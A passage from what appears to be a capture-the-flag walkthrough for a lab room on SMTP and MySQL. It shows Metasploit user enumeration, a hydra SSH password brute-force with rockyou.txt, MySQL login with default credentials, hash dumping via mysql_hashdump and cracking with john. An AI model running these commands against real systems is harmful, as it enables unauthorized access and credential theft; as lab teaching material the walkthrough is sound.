    msf6 &gt; use auxiliary/scanner/smtp/smtp_version
    msf6 auxiliary(scanner/smtp/smtp_version) &gt; options

    Module options (auxiliary/scanner/smtp/smtp_version):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
       RPORT    25               yes       The target port (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)

    msf6 auxiliary(scanner/smtp/smtp_version) &gt; set RHOSTS &lt;ip&gt;
    RHOSTS =&gt; &lt;ip&gt;
    msf6 auxiliary(scanner/smtp/smtp_version) &gt; exploit

    [+] &lt;ip&gt;:25      - &lt;ip&gt;:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
    [*] &lt;ip&gt;:25      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    msf6 auxiliary(scanner/smtp/smtp_version) &gt; use auxiliary/scanner/smtp/smtp_relay
    msf6 auxiliary(scanner/smtp/smtp_relay) &gt; options

    Module options (auxiliary/scanner/smtp/smtp_relay):

       Name      Current Setting     Required  Description
       ----      ---------------     --------  -----------
       EXTENDED  false               yes       Do all the 16 extended checks
       MAILFROM  sender@example.com  yes       FROM address of the e-mail
       MAILTO    target@example.com  yes       TO address of the e-mail
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
       RPORT     25                  yes       The target port (TCP)
       THREADS   1                   yes       The number of concurrent threads (max one per host)

    msf6 auxiliary(scanner/smtp/smtp_relay) &gt; set RHOSTS &lt;ip&gt;
    RHOSTS =&gt; &lt;ip&gt;
    msf6 auxiliary(scanner/smtp/smtp_relay) &gt; exploit

    [+] &lt;ip&gt;:25      - SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
    [*] &lt;ip&gt;:25      - No relay detected
    [*] &lt;ip&gt;:25      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    msf6 auxiliary(scanner/smtp/smtp_relay) &gt; use auxiliary/scanner/smtp/smtp_enum
    msf6 auxiliary(scanner/smtp/smtp_enum) &gt; options

    Module options (auxiliary/scanner/smtp/smtp_enum):

       Name       Current Setting                                                             Required  Description
       ----       ---------------                                                             --------  -----------
       RHOSTS                                                                                 yes       The target host(s), range CIDR  identifier, or hosts file with syntax 'file:&lt;path&gt;'
       RPORT      25                                                                          yes       The target port (TCP)
       THREADS    1                                                                           yes       The number of concurrent threads (max   one per host)
       UNIXONLY   true                                                                        yes       Skip Microsoft bannered servers when    testing unix users
       USER_FILE  /opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt  yes       The file that contains a list of    probable users accounts.

    msf6 auxiliary(scanner/smtp/smtp_enum) &gt; set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
    USER_FILE =&gt; /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
    msf6 auxiliary(scanner/smtp/smtp_enum) &gt; set RHOSTS &lt;ip&gt;
    RHOSTS =&gt; &lt;ip&gt;
    msf6 auxiliary(scanner/smtp/smtp_enum) &gt; set THREADS 16
    THREADS =&gt; 16

    msf6 auxiliary(scanner/smtp/smtp_enum) &gt; exploit

    [*] &lt;ip&gt;:25      - &lt;ip&gt;:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
    [+] &lt;ip&gt;:25      - &lt;ip&gt;:25 Users found: administrator
    [*] &lt;ip&gt;:25      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
</code></pre><h3 id="task-7---exploiting-smtp">Task 7 - Exploiting SMTP</h3><h3 id="references-5">References</h3><ul><li><a href="https://4n3i5v74.github.io/posts/build-own-hacking-os/#install-hydra" target="_blank">Install hydra</a></ul><p>Use <code>hydra</code> to enumerate ssh, since a valid user <code>administrator</code> is found in <code>msfconsole</code> auxiliary scan.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="hydra%20-t%2016%20-l%20administrator%20-P%20/usr/share/wordlists/rockyou.txt%20-vV%20%3Cip%3E%20ssh" type="button"></button></div></div><pre><code>hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV &lt;ip&gt; ssh
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Hydra%20v9.2-dev%20(c)%202021%20by%20van%20Hauser/THC%20&amp;%20David%20Maciejak%20-%20Please%20do%20not%20use%20in%20military%20or%20secret%20service%20organizations,%20or%20for%20illegal%20%20purposes%20(this%20is%20non-binding,%20these%20***%20ignore%20laws%20and%20ethics%20anyway).%0A%0AHydra%20(https://github.com/vanhauser-thc/thc-hydra)%20starting%20at%202021-01-05%2023:23:00%0A[WARNING]%20Many%20SSH%20configurations%20limit%20the%20number%20of%20parallel%20tasks,%20it%20is%20recommended%20to%20reduce%20the%20tasks:%20use%20-t%204%0A[DATA]%20max%2016%20tasks%20per%201%20server,%20overall%2016%20tasks,%2014344399%20login%20tries%20(l:1/p:14344399),%20~896525%20tries%20per%20task%0A[DATA]%20attacking%20ssh://%3Cip%3E:22/%0A[VERBOSE]%20Resolving%20addresses%20...%20[VERBOSE]%20resolving%20done%0A[INFO]%20Testing%20if%20password%20authentication%20is%20supported%20by%20ssh://administrator@%3Cip%3E:22%0A[INFO]%20Successful,%20password%20authentication%20is%20supported%20by%20ssh://%3Cip%3E:22%0A[22][ssh]%20host:%20%3Cip%3E%20%20%20login:%20administrator%20%20%20password:%20%3Cpassword%3E%0A[STATUS]%20attack%20finished%20for%20%3Cip%3E%20(waiting%20for%20children%20to%20complete%20tests)%0A1%20of%201%20target%20successfully%20completed,%201%20valid%20password%20found%0A[WARNING]%20Writing%20restore%20file%20because%204%20final%20worker%20threads%20did%20not%20complete%20until%20end.%0A[ERROR]%204%20targets%20did%20not%20resolve%20or%20could%20not%20be%20connected%0A[ERROR]%200%20target%20did%20not%20complete%0AHydra%20(https://github.com/vanhauser-thc/thc-hydra)%20finished%20at%202021-01-05%2023:23:59" type="button"></button></div></div><pre><code>Hydra v9.2-dev (c) 2021 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal  purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-05 23:23:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://&lt;ip&gt;:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://administrator@&lt;ip&gt;:22
[INFO] Successful, password authentication is supported by ssh://&lt;ip&gt;:22
[22][ssh] host: &lt;ip&gt;   login: administrator   password: &lt;password&gt;
[STATUS] attack finished for &lt;ip&gt; (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-05 23:23:59
</code></pre><p>Login to <code>ssh</code> session with the cracked password and get the flag.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="ssh%20administrator@%3Cip%3E%0Acat%20smtp.txt%0A%20%20%20%20%3Cflag%3E" type="button"></button></div></div><pre><code>ssh administrator@&lt;ip&gt;
cat smtp.txt
    &lt;flag&gt;
</code></pre><h2 id="mysql">MySQL</h2><h3 id="task-8---understanding-mysql">Task 8 - Understanding MySQL</h3><h3 id="references-6">References</h3><ul><li><a href="https://dev.mysql.com/doc/dev/mysql-server/latest/PAGE_SQL_EXECUTION.html" target="_blank">MySQL Reference</a><li><a href="https://www.w3schools.com/php/php_mysql_intro.asp" target="_blank">MySQL Reference</a></ul><h3 id="task-9---enumerating-mysql">Task 9 - Enumerating MySQL</h3><h3 id="references-7">References</h3><ul><li><a href="https://4n3i5v74.github.io/posts/cheatsheet-nmap/" target="_blank">NMAP Reference</a><li><a href="https://nmap.org/nsedoc/scripts/mysql-enum.html" target="_blank">NMAP Script for MySQL</a><li><a href="https://4n3i5v74.github.io/posts/cheatsheet-nmap/" target="_blank">MySQL Exploit</a></ul><p>Use <code>nmap</code> to find open ports using quick scan.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="map%20-Pn%20-T4%20-sS%20--top%202000%20--reason%20--open%20%3Cip%3E" type="button"></button></div></div><pre><code>map -Pn -T4 -sS --top 2000 --reason --open &lt;ip&gt;
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Starting%20Nmap%207.80%20(%20https://nmap.org%20)%20at%202021-01-13%2017:19%20UTC%0ANmap%20scan%20report%20for%20%3Chostname%3E%20(%3Cip%3E)%0AHost%20is%20up,%20received%20arp-response%20(0.00081s%20latency).%0ANot%20shown:%201998%20closed%20ports%0AReason:%201998%20resets%0APORT%20%20%20%20%20STATE%20SERVICE%20REASON%0A22/tcp%20%20%20open%20%20ssh%20%20%20%20%20syn-ack%20ttl%2064%0A3306/tcp%20open%20%20mysql%20%20%20syn-ack%20ttl%2064%0AMAC%20Address:%2002:9F:FE:B4:B9:EB%20(Unknown)%0A%0ANmap%20done:%201%20IP%20address%20(1%20host%20up)%20scanned%20in%200.55%20seconds" type="button"></button></div></div><pre><code>Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-13 17:19 UTC
Nmap scan report for &lt;hostname&gt; (&lt;ip&gt;)
Host is up, received arp-response (0.00081s latency).
Not shown: 1998 closed ports
Reason: 1998 resets
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
3306/tcp open  mysql   syn-ack ttl 64
MAC Address: 02:9F:FE:B4:B9:EB (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
</code></pre><p>Use <code>mysql</code> to login and verify with credentials <code>root:password</code>. The <code>mysql</code> binary can be found in <code>mysql-client</code> package.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="mysql%20-h%20%3Cip%3E%20-u%20root%20-p" type="button"></button></div></div><pre><code>mysql -h &lt;ip&gt; -u root -p
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Enter%20password:%20password%0AWelcome%20to%20the%20MariaDB%20monitor.%20%20Commands%20end%20with%20;%20or%20%5Cg.%0AYour%20MySQL%20connection%20id%20is%202%0AServer%20version:%205.7.29-0ubuntu0.18.04.1%20(Ubuntu)%0A%0ACopyright%20(c)%202000,%202018,%20Oracle,%20MariaDB%20Corporation%20Ab%20and%20others.%0A%0AType%20'help;'%20or%20'%5Ch'%20for%20help.%20Type%20'%5Cc'%20to%20clear%20the%20current%20input%20statement.%0A%0AMySQL%20[(none)]%3E%20exit%0ABye" type="button"></button></div></div><pre><code>Enter password: password
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]&gt; exit
Bye
</code></pre><p>Use <code>msfconsole</code> to perform auxiliary scan and get database information.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="msfconsole%0A%20%20%20%20msf5%20%3E%20search%20mysql_sql%0A%0A%20%20%20%20Matching%20Modules%0A%0A%20%20%20%20#%20%20Name%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Disclosure%20Date%20%20Rank%20%20%20%20Check%20%20Description%0A%20%20%20%20-%20%20----%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20---------------%20%20----%20%20%20%20-----%20%20-----------%0A%20%20%20%200%20%20auxiliary/admin/mysql/mysql_sql%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20normal%20%20No%20%20%20%20%20MySQL%20SQL%20Generic%20Query%0A%0A%20%20%20%20msf5%20%3E%20use%20auxiliary/admin/mysql/mysql_sql%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20show%20options%0A%0A%20%20%20%20Module%20options%20(auxiliary/admin/mysql/mysql_sql):%0A%0A%20%20%20%20Name%20%20%20%20%20%20Current%20Setting%20%20%20Required%20%20Description%0A%20%20%20%20----%20%20%20%20%20%20---------------%20%20%20--------%20%20-----------%0A%20%20%20%20PASSWORD%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20no%20%20%20%20%20%20%20%20The%20password%20for%20the%20specified%20username%0A%20%20%20%20RHOSTS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20host(s),%20range%20CIDR%20identifier,%20or%20hosts%20file%20with%20syntax%20'file:%3Cpath%3E'%0A%20%20%20%20RPORT%20%20%20%20%203306%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20port%20(TCP)%0A%20%20%20%20SQL%20%20%20%20%20%20%20select%20version()%20%20yes%20%20%20%20%20%20%20The%20SQL%20to%20execute.%0A%20%20%20%20USERNAME%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20no%20%20%20%20%20%20%20%20The%20username%20to%20authenticate%20as%0A%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20show%20missing%0A%0A%20%20%20%20Module%20options%20(auxiliary/admin/mysql/mysql_sql):%0A%0A%20%20%20%20Name%20%20%20%20Current%20Setting%20%20Required%20%20Description%0A%20%20%20%20----%20%20%20%20---------------%20%20--------%20%20-----------%0A%20%20%20%20RHOSTS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20host(s),%20range%20CIDR%20identifier,%20or%20hosts%20file%20with%20syntax%20'file:%3Cpath%3E'%0A%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20set%20RHOSTS%20%3Cip%3E%0A%20%20%20%20RHOSTS%20=%3E%20%3Cip%3E%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20set%20USERNAME%20root%0A%20%20%20%20USERNAME%20=%3E%20root%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20set%20PASSWORD%20password%0A%20%20%20%20PASSWORD%20=%3E%20password%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20exploit%0A%20%20%20%20[*]%20Running%20module%20against%20%3Cip%3E%0A%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20Sending%20statement:%20'select%20version()'...%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20%20%7C%205.7.29-0ubuntu0.18.04.1%20%7C%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed%0A%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20set%20SQL%20'show%20databases'%0A%20%20%20%20SQL%20=%3E%20show%20databases%0A%20%20%20%20msf5%20auxiliary(admin/mysql/mysql_sql)%20%3E%20exploit%0A%20%20%20%20[*]%20Running%20module%20against%20%3Cip%3E%0A%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20Sending%20statement:%20'show%20databases'...%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20%20%7C%20information_schema%20%7C%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20%20%7C%20mysql%20%7C%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20%20%7C%20performance_schema%20%7C%0A%20%20%20%20[*]%20%3Cip%3E:3306%20-%20%20%7C%20sys%20%7C%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed" type="button"></button></div></div><pre><code>msfconsole
    msf5 &gt; search mysql_sql

    Matching Modules

    #  Name                             Disclosure Date  Rank    Check  Description
    -  ----                             ---------------  ----    -----  -----------
    0  auxiliary/admin/mysql/mysql_sql                   normal  No     MySQL SQL Generic Query

    msf5 &gt; use auxiliary/admin/mysql/mysql_sql
    msf5 auxiliary(admin/mysql/mysql_sql) &gt; show options

    Module options (auxiliary/admin/mysql/mysql_sql):

    Name      Current Setting   Required  Description
    ----      ---------------   --------  -----------
    PASSWORD                    no        The password for the specified username
    RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
    RPORT     3306              yes       The target port (TCP)
    SQL       select version()  yes       The SQL to execute.
    USERNAME                    no        The username to authenticate as

    msf5 auxiliary(admin/mysql/mysql_sql) &gt; show missing

    Module options (auxiliary/admin/mysql/mysql_sql):

    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
    RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'

    msf5 auxiliary(admin/mysql/mysql_sql) &gt; set RHOSTS &lt;ip&gt;
    RHOSTS =&gt; &lt;ip&gt;
    msf5 auxiliary(admin/mysql/mysql_sql) &gt; set USERNAME root
    USERNAME =&gt; root
    msf5 auxiliary(admin/mysql/mysql_sql) &gt; set PASSWORD password
    PASSWORD =&gt; password
    msf5 auxiliary(admin/mysql/mysql_sql) &gt; exploit
    [*] Running module against &lt;ip&gt;

    [*] &lt;ip&gt;:3306 - Sending statement: 'select version()'...
    [*] &lt;ip&gt;:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
    [*] Auxiliary module execution completed

    msf5 auxiliary(admin/mysql/mysql_sql) &gt; set SQL 'show databases'
    SQL =&gt; show databases
    msf5 auxiliary(admin/mysql/mysql_sql) &gt; exploit
    [*] Running module against &lt;ip&gt;

    [*] &lt;ip&gt;:3306 - Sending statement: 'show databases'...
    [*] &lt;ip&gt;:3306 -  | information_schema |
    [*] &lt;ip&gt;:3306 -  | mysql |
    [*] &lt;ip&gt;:3306 -  | performance_schema |
    [*] &lt;ip&gt;:3306 -  | sys |
    [*] Auxiliary module execution completed
</code></pre><h3 id="task-10---exploiting-mysql">Task 10 - Exploiting MySQL</h3><p>Use <code>msfconsole</code> to exploit <code>mysql</code> and get password information.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="msfconsole%0A%20%20%20%20msf5%20%3E%20use%20auxiliary/scanner/mysql/mysql_schemadump%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_schemadump)%20%3E%20set%20RHOSTS%20%3Cip%3E%0A%20%20%20%20RHOSTS%20=%3E%20%3Cip%3E%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_schemadump)%20%3E%20set%20USERNAME%20root%0A%20%20%20%20USERNAME%20=%3E%20root%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_schemadump)%20%3E%20set%20PASSWORD%20password%0A%20%20%20%20PASSWORD%20=%3E%20password%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_schemadump)%20%3E%20exploit%0A%0A%20%20%20%20-%20TableName:%20x$waits_global_by_latency%0A%20%20%20%20%20%20%20%20Columns:%0A%20%20%20%20%20%20%20%20-%20ColumnName:%20events%0A%20%20%20%20%20%20%20%20ColumnType:%20varchar(128)%0A%20%20%20%20%20%20%20%20-%20ColumnName:%20total%0A%20%20%20%20%20%20%20%20ColumnType:%20bigint(20)%20unsigned%0A%20%20%20%20%20%20%20%20-%20ColumnName:%20total_latency%0A%20%20%20%20%20%20%20%20ColumnType:%20bigint(20)%20unsigned%0A%20%20%20%20%20%20%20%20-%20ColumnName:%20avg_latency%0A%20%20%20%20%20%20%20%20ColumnType:%20bigint(20)%20unsigned%0A%20%20%20%20%20%20%20%20-%20ColumnName:%20max_latency%0A%20%20%20%20%20%20%20%20ColumnType:%20bigint(20)%20unsigned%0A%0A%20%20%20%20[*]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Scanned%201%20of%201%20hosts%20(100%25%20complete)%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed%0A%0A%20%20%20%20msf5%20%3E%20use%20auxiliary/scanner/mysql/mysql_hashdump%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%20show%20options%0A%0A%20%20%20%20Module%20options%20(auxiliary/scanner/mysql/mysql_hashdump):%0A%0A%20%20%20%20Name%20%20%20%20%20%20Current%20Setting%20%20Required%20%20Description%0A%20%20%20%20----%20%20%20%20%20%20---------------%20%20--------%20%20-----------%0A%20%20%20%20PASSWORD%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20no%20%20%20%20%20%20%20%20The%20password%20for%20the%20specified%20username%0A%20%20%20%20RHOSTS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20host(s),%20range%20CIDR%20identifier,%20or%20hosts%20file%20with%20syntax%20'file:%3Cpath%3E'%0A%20%20%20%20RPORT%20%20%20%20%203306%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20target%20port%20(TCP)%0A%20%20%20%20THREADS%20%20%201%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20yes%20%20%20%20%20%20%20The%20number%20of%20concurrent%20threads%20(max%20one%20per%20host)%0A%20%20%20%20USERNAME%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20no%20%20%20%20%20%20%20%20The%20username%20to%20authenticate%20as%0A%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%20set%20RHOSTS%20%3Cip%3E%0A%20%20%20%20RHOSTS%20=%3E%20%3Cip%3E%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%20set%20USERNAME%20root%0A%20%20%20%20USERNAME%20=%3E%20root%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%20set%20PASSWORD%20password%0A%20%20%20%20PASSWORD%20=%3E%20password%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%20exploit%0A%20%20%20%20msf5%20auxiliary(scanner/mysql/mysql_hashdump)%20%3E%20exploit%0A%0A%20%20%20%20[+]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Saving%20HashString%20as%20Loot:%20root:%0A%20%20%20%20[+]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Saving%20HashString%20as%20Loot:%20mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE%0A%20%20%20%20[+]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Saving%20HashString%20as%20Loot:%20mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE%0A%20%20%20%20[+]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Saving%20HashString%20as%20Loot:%20debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E%0A%20%20%20%20[+]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Saving%20HashString%20as%20Loot:%20root:*%3Chash%3E%0A%20%20%20%20[+]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Saving%20HashString%20as%20Loot:%20carl:*%3Chash%3E%0A%20%20%20%20[*]%20%3Cip%3E:3306%20%20%20%20%20%20-%20Scanned%201%20of%201%20hosts%20(100%25%20complete)%0A%20%20%20%20[*]%20Auxiliary%20module%20execution%20completed" type="button"></button></div></div><pre><code>msfconsole
    msf5 &gt; use auxiliary/scanner/mysql/mysql_schemadump
    msf5 auxiliary(scanner/mysql/mysql_schemadump) &gt; set RHOSTS &lt;ip&gt;
    RHOSTS =&gt; &lt;ip&gt;
    msf5 auxiliary(scanner/mysql/mysql_schemadump) &gt; set USERNAME root
    USERNAME =&gt; root
    msf5 auxiliary(scanner/mysql/mysql_schemadump) &gt; set PASSWORD password
    PASSWORD =&gt; password
    msf5 auxiliary(scanner/mysql/mysql_schemadump) &gt; exploit

    - TableName: x$waits_global_by_latency
        Columns:
        - ColumnName: events
        ColumnType: varchar(128)
        - ColumnName: total
        ColumnType: bigint(20) unsigned
        - ColumnName: total_latency
        ColumnType: bigint(20) unsigned
        - ColumnName: avg_latency
        ColumnType: bigint(20) unsigned
        - ColumnName: max_latency
        ColumnType: bigint(20) unsigned

    [*] &lt;ip&gt;:3306      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    msf5 &gt; use auxiliary/scanner/mysql/mysql_hashdump
    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt; show options

    Module options (auxiliary/scanner/mysql/mysql_hashdump):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    PASSWORD                   no        The password for the specified username
    RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
    RPORT     3306             yes       The target port (TCP)
    THREADS   1                yes       The number of concurrent threads (max one per host)
    USERNAME                   no        The username to authenticate as

    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt; set RHOSTS &lt;ip&gt;
    RHOSTS =&gt; &lt;ip&gt;
    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt;
    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt; set USERNAME root
    USERNAME =&gt; root
    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt; set PASSWORD password
    PASSWORD =&gt; password
    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt; exploit
    msf5 auxiliary(scanner/mysql/mysql_hashdump) &gt; exploit

    [+] &lt;ip&gt;:3306      - Saving HashString as Loot: root:
    [+] &lt;ip&gt;:3306      - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
    [+] &lt;ip&gt;:3306      - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
    [+] &lt;ip&gt;:3306      - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
    [+] &lt;ip&gt;:3306      - Saving HashString as Loot: root:*&lt;hash&gt;
    [+] &lt;ip&gt;:3306      - Saving HashString as Loot: carl:*&lt;hash&gt;
    [*] &lt;ip&gt;:3306      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
</code></pre><p>Sae the obtained hash in text and use <code>john</code> to crack the hash.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="echo%20'carl:*%3Chash%3E'%20%3E%20hash.txt%0Ajohn%20hash.txt" type="button"></button></div></div><pre><code>echo 'carl:*&lt;hash&gt;' &gt; hash.txt
john hash.txt
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="Warning:%20detected%20hash%20type%20%22mysql-sha1%22,%20but%20the%20string%20is%20also%20recognized%20as%20%22mysql-sha1-opencl%22%0AUse%20the%20%22--format=mysql-sha1-opencl%22%20option%20to%20force%20loading%20these%20as%20that%20type%20instead%0AUsing%20default%20input%20encoding:%20UTF-8%0ALoaded%201%20password%20hash%20(mysql-sha1,%20MySQL%204.1+%20[SHA1%20256/256%20AVX2%208x])%0AWarning:%20no%20OpenMP%20support%20for%20this%20hash%20type,%20consider%20--fork=2%0AProceeding%20with%20single,%20rules:Single%0APress%20'q'%20or%20Ctrl-C%20to%20abort,%20almost%20any%20other%20key%20for%20status%0AWarning:%20Only%202%20candidates%20buffered%20for%20the%20current%20salt,%20minimum%208%20needed%20for%20performance.%0AAlmost%20done:%20Processing%20the%20remaining%20buffered%20candidate%20passwords,%20if%20any.%0AProceeding%20with%20wordlist:/opt/john/password.lst%0AProceeding%20with%20incremental:ASCII%0A%3Cpassword%3E%20%20%20%20%20%20%20%20%20%20%20(carl)%0A1g%200:00:00:01%20DONE%203/3%20(2021-01-13%2017:51)%200.7407g/s%201693Kp/s%201693Kc/s%201693KC/s%20doggie..doggia%0AUse%20the%20%22--show%22%20option%20to%20display%20all%20of%20the%20cracked%20passwords%20reliably%0ASession%20completed." type="button"></button></div></div><pre><code>Warning: detected hash type "mysql-sha1", but the string is also recognized as "mysql-sha1-opencl"
Use the "--format=mysql-sha1-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/opt/john/password.lst
Proceeding with incremental:ASCII
&lt;password&gt;           (carl)
1g 0:00:00:01 DONE 3/3 (2021-01-13 17:51) 0.7407g/s 1693Kp/s 1693Kc/s 1693KC/s doggie..doggia
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
